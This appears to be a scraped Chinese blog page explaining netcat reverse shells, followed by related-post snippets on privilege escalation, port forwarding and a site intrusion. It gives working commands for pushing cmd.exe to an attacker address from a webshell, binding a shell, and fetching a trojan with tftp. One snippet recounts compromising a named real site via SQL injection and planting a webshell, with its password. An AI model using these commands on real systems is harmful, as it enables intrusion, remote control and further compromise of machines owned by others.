nc 反弹链接

nc -l -v -p 80在本机监听80端口,此时80端口是打开的,我们可以在浏览器输入127.0.0.1进行浏览,此时就会出现连接,我们再在监听窗口输入字符,就会在浏览器上显示了。知道上面的作用后,我们就可以在此的基础上,再在webshell里面执行 nc -e cmd.exe 192.168.246.1 80此条命令会把cmd反弹到192.168.246.1上,我们就可以想在本地一样,使用cmd。
这里是nc的命令说明:
-l 监听本地入栈信息
-p port 打开本地端口
-t 以telnet形式应答入栈请求
-e 程序重定向
D:\www\aram\nc -l -p 110 -t -e D:\www\aram\cmd.exe
传马命令:tftp -i ip地址 get 木马名字.exe
如果不懂的话看这里的教程:http://www.baidu.com/s?wd=NC反弹提权+site%3Apan.baidu.com&rsv_bp=0&ch=1&tn=98012088_3_dg&bar=&rsv_spt=3&ie=utf-8&rsv_n=2&rsv_sug3=1&rsv_sug1

时间: 2024-10-11 11:21:37

nc 反弹链接的相关文章

使用netcat进行反弹链接的shellcode

from:http://morgawr.github.io/hacking/2014/03/29/shellcode-to-reverse-bind-with-netcat/ 这篇文章主要是谈,在远程溢出时怎样构造shellcode,才能形成一个有效的反弹链接. 0x00 反向绑定远程shell 让本地主机和远程shell建立起连接的方法有很多种,其中最常见的是在远程主机上开放一个端口,然后把它的 stdout/stderr/stdin 重定向到一个shell上. 这样我们就可以在自己的主机上通

反弹链接

[反弹链接] 反弹链接,码迷,mamicode.com

使用 OpenSSL 反弹加密 shell

目录 前言 OpenSSL 简介 使用 OpenSSL 生成证书自签名证书 使用 OpenSSL 反弹加密 shell Linux Windows 使用 OpenSSL 搭建简易 HTTPS Server 参考链接 前言 在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的. 我们使用 nc 反弹 shell 进行测试 使用 wireshark 可

nc ltx转发

加账户net user seayace seay /add 建立账户,用户名seayace 密码seaynet localgroup Administrators seayace /add 提升到管理员权限 开启3389REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f query user 查看会话 logoff ID号 踢

Linux 反弹 Shell

攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反弹 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接地或容易地驱动. 同时,nc又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能.渗透测试中,linux主机一般自带nc,Windows主机需要自行上传. 姿势一

入侵某有限公司#并成功提下西部数码某虚拟主机

目标站点存在dede5.7通用的sql注入漏洞 利用工具  直接插入一个管理员 随后通过某大牛的爬虫工具获取到后台地址为 http://www.syguizaoni.com/gzhhoutai/index.php 登录 直接在功能表里的文件式管理器里面上传一个大马 大马地址: http://www.syguizaoni.com/uploads/php.php 密码:520 可以跨目录查看多个站群  便知道这个服务器是一个虚拟主机 然后上传一个小马  准备提权 http://www.syguiza

提权笔记本

/* 转载请注明出处 ID:珍惜少年时 */ 21------------FTP //找到其FTP目录,破解其密码搜索,提之 22------------linux终端 23------------telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下! 1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字,找到该文件后Ctrl+f搜索关键字提之 3306----------mysql

内网渗透之端口转发

内网端口转发最常见的不外乎lcx与nc反弹了,好久不用快忘了,今天总结一下 一.使用lcx进行内网端口转发 Lcx.exe是一个端口转发工具,相当于把目标服务器A上的3389端口转发到具有外网ip地址的B机上(即我们自己的主机或是已经控制的主机),这样链接B机的3389端口就相当于链接A机的3389端口了,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389

双11活动预告(3)黑麒麟培训课程

上量篇双11活动资源预告(<这些安全类书籍,值得一读>,<双11活动免费发放资源预告(2)>)中,我预告了本订阅号 双11会免费送出的一些纸质书籍,和边界安全授权发布的他们的培训课程. 本次预告的内容是由 [h.e.z] Security Team ( 黑麒麟团队 ) 制作的收费培训课程, 经过该团队的授权,允许在玄魂工作室的公众号免费发放. 这些资料可能已经有人泄露到网络上了, 玄魂工作室在此发布,第一是认为 这些是好课程,值得推荐:第二是 尊重版权,我们可以在网上不经原创团队就